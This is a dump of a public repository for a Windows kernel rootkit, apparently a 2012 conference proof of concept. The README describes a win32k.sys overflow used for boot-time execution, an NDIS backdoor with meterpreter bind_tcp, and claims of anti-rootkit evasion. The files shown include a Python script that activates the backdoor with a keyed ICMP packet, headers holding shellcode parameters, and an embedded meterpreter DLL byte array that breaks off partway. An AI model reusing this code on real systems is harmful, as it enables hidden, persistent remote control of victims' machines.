Repository: Cr4sh/WindowsRegistryRootkit Branch: master Commit: 41a772552abb Files: 52 Total size: 351.8 KB Directory structure: gitextract_hzqo4tbr/ ├── README.md ├── bin/ │ ├── rootkit_installer.pdb │ └── rootkit_ping.py └── src/ ├── common/ │ ├── catchy32.h │ ├── catchy32.lib │ ├── common.h │ ├── debug.cpp │ ├── debug.h │ ├── ntdll_defs.h │ ├── shellcode2_struct.h │ └── undocnt.h ├── includes/ │ ├── meterpreter_debug.dll.h │ └── rootkit_driver_debug.sys.h ├── meterpreter/ │ ├── dllmain.cpp │ ├── meterpreter.cpp │ ├── meterpreter.def │ ├── meterpreter.vcproj │ ├── post_build.bat │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── meterpreter_bind_tcp.h ├── meterpreter_config.h ├── meterpreter_debug.pdb ├── rootkit.sln ├── rootkit_driver/ │ ├── bogusproto.cpp │ ├── bogusproto.h │ ├── debug.h │ ├── dll_inject.cpp │ ├── dll_inject.h │ ├── dll_inject_shellcode.h │ ├── ndis_hook.cpp │ ├── ndis_hook.h │ ├── network.cpp │ ├── network.h │ ├── post_build.bat │ ├── rootkit_driver.cpp │ ├── rootkit_driver.def │ ├── rootkit_driver.h │ ├── rootkit_driver.vcproj │ ├── runtime.cpp │ ├── runtime.h │ ├── stdafx.h │ └── undocnt.h ├── rootkit_driver_config.h ├── rootkit_driver_debug.pdb ├── rootkit_driver_debug.sys └── rootkit_installer/ ├── rootkit_installer.cpp ├── rootkit_installer.vcproj ├── stdafx.cpp ├── stdafx.h └── targetver.h ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ ****************************************************************************** Kernel rootkit, that lives inside the Windows registry value data. 
By Oleksiuk Dmytro (aka Cr4sh)

http://twitter.com/d_olex
http://blog.cr4.sh
cr4sh0@gmail.com
******************************************************************************

Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup.

Features:

* NDIS-based network backdoor (+ meterpreter/bind_tcp).
* In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers.
* Completely undetectable by public anti-rootkit tools.
* Working on Windows 7 (SP0, SP1) x86.

![diagram](https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/WindowsRegistryRootkit-execution.png)

This rootkit was originally presented at the ZeroNights 2012 conference during my talk. See the slides and videos for more information: https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/Applied-anti-forensics.pdf

================================================
FILE: bin/rootkit_ping.py
================================================
#####################################################################
#
# Windows kernel rootkit PoC using registry values processing BoF.
#
# Script for meterpreter/bind_tcp backdoor activation on TCP/4444
# port of infected target.
#
# (c) 2012, Oleksiuk Dmytro (aka Cr4sh)
# cr4sh@riseup.net
#
#####################################################################

# NOTE(review): this is Python 2 source (print statements and the
# "except Exception, why" form); it does not parse under Python 3.
# What the script does, in order: parse --key/--dst, send one ICMP echo
# request carrying "RKCTL:" + key, then send a single TCP SYN to port 4444
# and report whether a SYN-ACK came back.

# os is imported but never referenced in this script
import sys, os
from optparse import OptionParser

# TCP port probed after the ICMP packet has been sent
BACKDOOR_PORT_NUMBER = 4444

# seconds to wait for a reply to the ICMP packet
TIMEOUT = 5

try:

    # The wildcard import is what brings IP, ICMP, TCP, RandShort and sr1
    # into scope for the code below.
    from scapy.all import *

except Exception, why:

    print "[!] Exception while importing module: " + str(why)
    print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?"

    # sys.exit() without an argument ends the process with status 0, so a
    # calling script cannot tell this failure from success
    sys.exit()

if __name__ == '__main__':

    print "***********************************************************\n"
    print " Windows kernrel rootkit PoC using registry values processing BoF.\n"
    print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)"
    print " cr4sh@riseup.net\n"
    print "***********************************************************\n"

    parser = OptionParser()

    parser.add_option("-k", "--key", dest = "key", default = None,
        help = "Rootkit secret key.")

    parser.add_option("-d", "--dst", dest = "dst", default = None,
        help = "Destination host IP address.")

    # parse command line
    (options, args) = parser.parse_args()

    # both options are mandatory; as above, the exit status is still 0
    if options.key is None or options.dst is None:

        print "[!] Please specify --dst and --key options"
        sys.exit()

    # the key is echoed to stdout in clear, so it ends up in any terminal
    # log or captured output of this script
    print "[+] Destination host IP address: ", options.dst
    print "[+] Rootkit secret key: ", options.key
    print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER)

    # ICMP echo request (type 8, code 0) to the destination host
    ip = IP(dst = options.dst)
    icmp = ICMP(type = 8, code = 0)

    # Payload is the literal prefix "RKCTL:" followed by the key, with no
    # encoding or encryption applied here.
    # Detection: an ICMP echo request whose data begins with "RKCTL:" is the
    # on-wire signature of this script, and the key that follows the prefix
    # is readable by anything that captures the packet.
    data = "RKCTL:" + options.key

    # Send it and wait up to TIMEOUT seconds; the reply is discarded, so a
    # missing answer is not reported.
    sr1(ip/icmp/data, timeout = TIMEOUT)

    # Probe the backdoor port with a single SYN from a random source port.
    # seq is the constant 40 on every run, which makes the probe itself a
    # weak second indicator: a SYN with sequence number 40 to TCP/4444
    # arriving right after the ICMP packet above.
    ip = IP(dst = options.dst)
    TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40)

    # send SYN packet and wait up to one second for the first reply
    TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1)

    # 0x12 is SYN (0x02) | ACK (0x10). No reply at all, or a reply with any
    # other flag combination, is reported as "closed".
    if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12:

        # response from our target aka hostip - expect RST
        print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER

    else:

        print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER
        print "[+] It will be closed immediately after 'exit' command in meterpreter shell"

    # if end

#
# EoF
#
================================================
FILE: src/common/catchy32.h
================================================
#define CATCHY_ERROR 0xffffffff

#ifdef __cplusplus
extern "C" {
#endif

ULONG __cdecl c_Catchy(PVOID);

#ifdef __cplusplus
}
#endif
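================================================
FILE: src/common/common.h
================================================
// Interval sign helpers: TIME_ABSOLUTE passes the value through, TIME_RELATIVE negates it.
#define TIME_ABSOLUTE(wait) (wait)
#define TIME_RELATIVE(wait) (-(wait))

// TIME_NANOSECONDS divides by 100, so every TIME_* macro yields a count of
// 100-nanosecond units as a signed 64-bit value.
#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)
#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L))
#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L))
#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L))

// Base + offset as a byte pointer; the offset is truncated to ULONG.
#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_))

// Mask-based alignment: only correct when _align_ is a power of two.
// MY_ALIGN_UP evaluates its arguments more than once.
#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1))
#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_))

#define IFMT32 "0x%.8x"
#define IFMT64 "0x%.16I64x"

// Declares a local f_<name> of type func_<name> and fills it from ntdll.dll.
// The result is not checked here; callers must test f_<name> for NULL.
#define GET_NATIVE(_name_) \
 \
 func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \
 GetModuleHandle("ntdll.dll"), \
 (#_name_) \
 );

// Pointer-sized format string for the current target; left undefined when
// neither _X86_ nor _AMD64_ is set.
#if defined(_X86_)
#define IFMT IFMT32
#elif defined(_AMD64_)
#define IFMT IFMT64
#endif
================================================
FILE: src/common/debug.cpp
================================================
#include "stdafx.h"
//--------------------------------------------------------------------------------------
#ifdef DBG
//--------------------------------------------------------------------------------------
/**
 * Return a pointer to the last path component of lpszPath.
 *
 * Both '\\' and '/' count as separators. The result points into the caller's
 * buffer (nothing is copied); a path without separators is returned unchanged.
 */
char *GetNameFromFullPath(char *lpszPath)
{
    char *lpszName = lpszPath;

    // Measure once instead of on every loop test. lstrlenA() returns 0 for a
    // NULL pointer, so a NULL path skips the loop and is returned as is.
    int len = lstrlenA(lpszPath);

    for (int i = 0; i < len; i++)
    {
        if (lpszPath[i] == '\\' || lpszPath[i] == '/')
        {
            lpszName = lpszPath + i + 1;
        }
    }

    return lpszName;
}
//--------------------------------------------------------------------------------------
typedef int (__cdecl * func_sprintf)(LPSTR, LPCSTR, ...);
typedef int (__cdecl * func_vsprintf)(LPSTR, LPCSTR, va_list arglist);
typedef int (__cdecl * func__vscprintf)(const char *format, va_list argptr);

/**
 * Format a debug message and emit it.
 *
 * The message prefixed with "[pid] .\file(line) : " goes to the debugger via
 * OutputDebugStringA(); the bare message (no prefix) is written to stdout
 * when a standard output handle exists.
 *
 * lpszFile - source path, reduced to its file name for the prefix
 * Line     - source line number
 * lpszMsg  - printf-style format string followed by its arguments
 *
 * The CRT formatting routines are resolved from msvcrt.dll at run time; if
 * any of them is missing the call returns without output.
 */
void DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...)
{
    // Resolve the module once; each LoadLibraryA() call takes another
    // reference on msvcrt.dll and none of them is ever released.
    HMODULE hCrt = LoadLibraryA("msvcrt.dll");
    if (hCrt == NULL)
    {
        return;
    }

    func_sprintf f_sprintf = (func_sprintf)GetProcAddress(hCrt, "sprintf");
    func_vsprintf f_vsprintf = (func_vsprintf)GetProcAddress(hCrt, "vsprintf");
    func__vscprintf f__vscprintf = (func__vscprintf)GetProcAddress(hCrt, "_vscprintf");

    // va_start() has not run yet, so these early exits need no va_end()
    if (f_sprintf == NULL || f_vsprintf == NULL || f__vscprintf == NULL)
    {
        return;
    }

    char *lpszName = GetNameFromFullPath(lpszFile);

    va_list mylist;
    va_start(mylist, lpszMsg);

    // length of the formatted message, not counting the terminating NUL
    int msg_len = f__vscprintf(lpszMsg, mylist);

    va_end(mylist);

    if (msg_len < 0)
    {
        // _vscprintf() failed; the size below would be meaningless
        return;
    }

    size_t len = (size_t)msg_len + 0x100;

    // The prefixed line also carries the file name, which is not bounded by
    // the 0x100 bytes of slack, so it is added to the size explicitly.
    size_t out_len = len + (size_t)lstrlenA(lpszName);

    char *lpszBuff = (char *)LocalAlloc(LMEM_FIXED, len);
    if (lpszBuff == NULL)
    {
        return;
    }

    char *lpszOutBuff = (char *)LocalAlloc(LMEM_FIXED, out_len);
    if (lpszOutBuff == NULL)
    {
        LocalFree(lpszBuff);
        return;
    }

    // restart the argument list: the one above was consumed by _vscprintf()
    va_start(mylist, lpszMsg);
    f_vsprintf(lpszBuff, lpszMsg, mylist);
    va_end(mylist);

    f_sprintf(
        lpszOutBuff, "[%.5d] .\\%s(%d) : %s",
        GetCurrentProcessId(), lpszName, Line, lpszBuff
    );

    OutputDebugStringA(lpszOutBuff);

    // GetStdHandle() reports "no handle" as NULL and failure as INVALID_HANDLE_VALUE
    HANDLE hStd = GetStdHandle(STD_OUTPUT_HANDLE);
    if (hStd != NULL && hStd != INVALID_HANDLE_VALUE)
    {
        DWORD dwWritten = 0;

        // stdout gets the message without the pid/file/line prefix
        WriteFile(hStd, lpszBuff, lstrlenA(lpszBuff), &dwWritten, NULL);
    }

    LocalFree(lpszOutBuff);
    LocalFree(lpszBuff);
}
//--------------------------------------------------------------------------------------
#endif // DBG
//--------------------------------------------------------------------------------------
// EoF
================================================
FILE: src/common/debug.h
================================================
// With DBG undefined DbgMsg expands to nothing, so a call DbgMsg(a, b, c);
// is left as the comma expression (a, b, c); -- the arguments are still
// evaluated and their string literals are still compiled. Whether the
// optimizer later drops them is not visible from this header.
#ifdef DBG
void DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...);
#else
#define DbgMsg
#endif
================================================
FILE: src/common/ntdll_defs.h
================================================
typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };

    ULONG_PTR Information;

} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

#undef UNICODE_STRING

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
}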
UNICODE_STRING, *PUNICODE_STRING;

// Counted 8-bit string with the same three-field shape as UNICODE_STRING.
typedef struct _STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PCHAR Buffer;

} ANSI_STRING, *PANSI_STRING;

// Process/thread identifier pair (taken by func_ZwOpenThread in undocnt.h).
typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;

} CLIENT_ID, *PCLIENT_ID;

// Bit flags for OBJECT_ATTRIBUTES.Attributes.
#define OBJ_INHERIT 0x00000002
#define OBJ_PERMANENT 0x00000010
#define OBJ_EXCLUSIVE 0x00000020
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_OPENIF 0x00000080
#define OBJ_OPENLINK 0x00000100
#define OBJ_VALID_ATTRIBUTES 0x000001F2

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;

} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Fills every field of *p: Length from sizeof, SecurityQualityOfService with
// NULL, the rest from the arguments. The expansion is a bare { } block, not
// do { } while (0), so it cannot be used as the body of an if that is
// followed by else. Arguments n, a, r and s are not parenthesized.
#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
    }

// NT_SUCCESS: status is non-negative when read as a signed LONG.
// NT_ERROR: the two top bits are both set. The 0x8000000x codes below
// therefore fail NT_SUCCESS without being NT_ERROR.
#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)
#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)

#define NtCurrentProcess() ((HANDLE)-1)

// Status codes, each defined only if an earlier header has not done so.
#ifndef STATUS_BUFFER_OVERFLOW
#define STATUS_BUFFER_OVERFLOW ((NTSTATUS)0x80000005L)
#endif

#ifndef STATUS_NO_MORE_FILES
#define STATUS_NO_MORE_FILES ((NTSTATUS)0x80000006L)
#endif

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif

#ifndef STATUS_BUFFER_TOO_SMALL
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#endif

#ifndef STATUS_UNSUCCESSFUL
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#endif
================================================
FILE: src/common/shellcode2_struct.h
================================================
// Message text and the size of the buffer reserved for it in SC_PARAMS.
#define DBGPRINT_MESSAGE "YOU GOT PWND!\n"
#define DBGPRINT_MESSAGE_LEN 0x20

// Parameter block: two module base pointers, the size and base of the rootkit
// image, and a list of ULONG offset_* values. How the fields are filled and
// consumed is not visible in this header.
typedef struct _SC_PARAMS
{
    PVOID kernel_base;
    PVOID win32k_base;

    ULONG rootkit_size;
    PVOID rootkit_base;

    ULONG offset_MmIsAddressValid;
    ULONG offset_PsGetCurrentProcess;
    ULONG offset_PsGetProcessWin32Process;
    ULONG offset_ExAllocatePool;
    ULONG offset_RtlQueryRegistryValues;

    ULONG offset_UserInitialize;
    ULONG offset_bInitializeEUDC_patch;

// these two fields exist only when USE_SHELLCODE_DBGPRINT is defined
#ifdef USE_SHELLCODE_DBGPRINT

    ULONG offset_DbgPrint;
    char szDbgPrintMessage[DBGPRINT_MESSAGE_LEN];

#endif

} SC_PARAMS, *PSC_PARAMS;

/**
 * Offsets for SC_PARAMS fields.
 *
 * Hand-maintained mirror of the struct above: the values advance by 4 per
 * field, so they match the layout only where PVOID and ULONG are both 4
 * bytes wide. Nothing in this header checks that. _DbgPrint and
 * _szDbgPrintMessage are defined unconditionally although the fields they
 * name are compiled only under USE_SHELLCODE_DBGPRINT.
 */
#define _kernel_base 0x00
#define _win32k_base 0x04
#define _rootkit_size 0x08
#define _rootkit_base 0x0c
#define _MmIsAddressValid 0x10
#define _PsGetCurrentProcess 0x14
#define _PsGetProcessWin32Process 0x18
#define _ExAllocatePool 0x1c
#define _RtlQueryRegistryValues 0x20
#define _UserInitialize 0x24
#define _bInitializeEUDC_patch 0x28
#define _DbgPrint 0x2c
#define _szDbgPrintMessage 0x30

#define SHELLCODE_2_MAX_BUFF_SIZE 0x300
================================================
FILE: src/common/undocnt.h
================================================
/************************************************************/
/*                                                          */
/* Some structures for native API functions                 */
/*                                                          */
/************************************************************/

// No enumerator has an explicit value: each one's number is its position in
// this list, so inserting, removing or reordering entries renumbers every
// entry after the change.
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation, // obsolete...delete
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemPathInformation,
    SystemProcessInformation,
    SystemCallCountInformation,
    SystemDeviceInformation,
    SystemProcessorPerformanceInformation,
    SystemFlagsInformation,
    SystemCallTimeInformation,
    SystemModuleInformation,
    SystemLocksInformation,
    SystemStackTraceInformation,
    SystemPagedPoolInformation,
    SystemNonPagedPoolInformation,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPageFileInformation,
    SystemVdmInstemulInformation,
    SystemVdmBopInformation,
    SystemFileCacheInformation,
    SystemPoolTagInformation,
    SystemInterruptInformation,
    SystemDpcBehaviorInformation,
    SystemFullMemoryInformation,
    SystemLoadGdiDriverInformation,
    SystemUnloadGdiDriverInformation,
    SystemTimeAdjustmentInformation,
    SystemSummaryMemoryInformation,
    SystemMirrorMemoryInformation,
    SystemPerformanceTraceInformation,
    SystemObsolete0,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemExtendServiceTableInformation,
    SystemPrioritySeperation,
    SystemVerifierAddDriverInformation,
    SystemVerifierRemoveDriverInformation,
    SystemProcessorIdleInformation,
    SystemLegacyDriverInformation,
    SystemCurrentTimeZoneInformation,
    SystemLookasideInformation,
    SystemTimeSlipNotification,
    SystemSessionCreate,
    SystemSessionDetach,
    SystemSessionInformation,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemVerifierThunkExtend,
    SystemSessionProcessInformation,
    SystemLoadGdiDriverInSystemSpace,
    SystemNumaProcessorMap,
    SystemPrefetcherInformation,
    SystemExtendedProcessInformation,
    SystemRecommendedSharedDataAlignment,
    SystemComPlusPackage,
    SystemNumaAvailableMemory,
    SystemProcessorPowerInformation,
    SystemEmulationBasicInformation,
    SystemEmulationProcessorInformation,
    SystemExtendedHandleInformation,
    SystemLostDelayedWriteInformation,
    SystemBigPoolInformation,
    SystemSessionPoolTagInformation,
    SystemSessionMappedViewInformation,
    SystemHotpatchInformation,
    SystemObjectSecurityMode,
    SystemWatchdogTimerHandler,
    SystemWatchdogTimerInformation,
    SystemLogicalProcessorInformation,
    SystemWow64SharedInformation,
    SystemRegisterFirmwareTableInformationHandler,
    SystemFirmwareTableInformation,
    SystemModuleInformationEx,
    SystemVerifierTriageInformation,
    SystemSuperfetchInformation,
    SystemMemoryListInformation,
    SystemFileCacheInformationEx,
    MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum

} SYSTEM_INFORMATION_CLASS;

// One loaded-module record; the path is stored inline in a 256-byte array.
// OffsetToFileName presumably indexes the file-name part of FullPathName --
// confirm against the code that reads it.
typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
    HANDLE Section; // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[ 256 ];

} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

// Count followed by a one-element array; presumably the usual variable-length
// trailer with NumberOfModules entries, so any reader has to bound its index
// by the size of the buffer it actually received -- confirm at the call sites.
typedef struct _RTL_PROCESS_MODULES
{
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];

} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef enum _SHUTDOWN_ACTION
{
    ShutdownNoReboot,
    ShutdownReboot,
    ShutdownPowerOff

} SHUTDOWN_ACTION, *PSHUTDOWN_ACTION;

typedef struct _DIRECTORY_BASIC_INFORMATION
{
    UNICODE_STRING ObjectName;
    UNICODE_STRING ObjectTypeName;

} DIRECTORY_BASIC_INFORMATION, *PDIRECTORY_BASIC_INFORMATION;

// One handle-table record. UniqueProcessId and HandleValue are USHORT here,
// so values above 0xFFFF cannot be represented in this layout.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;

} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

// Same count + one-element-array shape as RTL_PROCESS_MODULES.
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];

} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

/************************************************************/
/*                                                          */
/* Prototypes for native and kernel API functions           */
/*                                                          */
/************************************************************/

// Everything below is a function-pointer TYPE named func_<routine>; this
// header binds none of them to an address. common.h's GET_NATIVE(name)
// declares f_<name> with type func_<name> and resolves it from ntdll.dll.

// Implicitly numbered like SYSTEM_INFORMATION_CLASS: position is the value.
typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum

} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef NTSTATUS (WINAPI * func_NtQueryIntervalProfile)(
    KPROFILE_SOURCE ProfileSource,
    PULONG Interval
);

typedef NTSTATUS (WINAPI * func_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

typedef CCHAR KPROCESSOR_MODE;

typedef enum _MODE
{
    KernelMode,
    UserMode,
    MaximumMode

} MODE;

typedef NTSTATUS (WINAPI * func_NtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

// From here on several types carry Ke*/Ps*/Ex*/Iof* names, i.e. they look
// like kernel-mode routines rather than ntdll exports -- where their
// addresses come from is not shown in this header.
typedef NTSTATUS (WINAPI * func_KeDelayExecutionThread)(
    KPROCESSOR_MODE WaitMode,
    BOOLEAN Alertable,
    PLARGE_INTEGER Interval
);

typedef VOID (WINAPI * func_KeUnstackDetachProcess)(
    PVOID ApcState
);

// Only the first two pool types are declared in this local copy.
typedef enum _POOL_TYPE
{
    NonPagedPool,
    PagedPool

} POOL_TYPE;

typedef PVOID (WINAPI * func_ExAllocatePool)(
    POOL_TYPE PoolType,
    SIZE_T NumberOfBytes
);

typedef HANDLE (WINAPI * func_PsGetCurrentProcessId)(VOID);
typedef HANDLE (WINAPI * func_PsGetCurrentThreadId)(VOID);
typedef PVOID (WINAPI * func_PsGetCurrentThread)(VOID);

typedef NTSTATUS (WINAPI * func_ZwOpenThread)(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId
);

typedef VOID (WINAPI * func_RtlInitUnicodeString)(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
);

typedef VOID (WINAPI * func_RtlInitAnsiString)(
    PANSI_STRING DestinationString,
    PCSTR SourceString
);

typedef NTSTATUS (WINAPI * func_RtlAnsiStringToUnicodeString)(
    PUNICODE_STRING DestinationString,
    PANSI_STRING SourceString,
    BOOLEAN AllocateDestinationString
);

typedef BOOLEAN (WINAPI * func_RtlEqualUnicodeString)(
    UNICODE_STRING *String1,
    UNICODE_STRING *String2,
    BOOLEAN CaseInSensitive
);

typedef VOID (WINAPI * func_RtlFreeUnicodeString)(
    PUNICODE_STRING UnicodeString
);

typedef NTSTATUS (WINAPI * func_NtOpenFile)(
    PHANDLE FileHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PIO_STATUS_BLOCK IoStatusBlock,
    ULONG ShareAccess,
    ULONG OpenOptions
);

// the only __fastcall type in this header; all others are WINAPI
typedef VOID (__fastcall * func_IofCompleteRequest)(
    struct _IRP *Irp,
    CCHAR PriorityBoost
);

typedef NTSTATUS (WINAPI * func_PsLookupProcessByProcessId)(
    HANDLE ProcessId,
    PVOID *Process
);
================================================
FILE:
src/includes/meterpreter_debug.dll.h ================================================ // 5632 bytes readed form ..\meterpreter_debug.dll... unsigned char dll[] = { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0, 0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0, 0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0, 0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00, 0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00, 0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
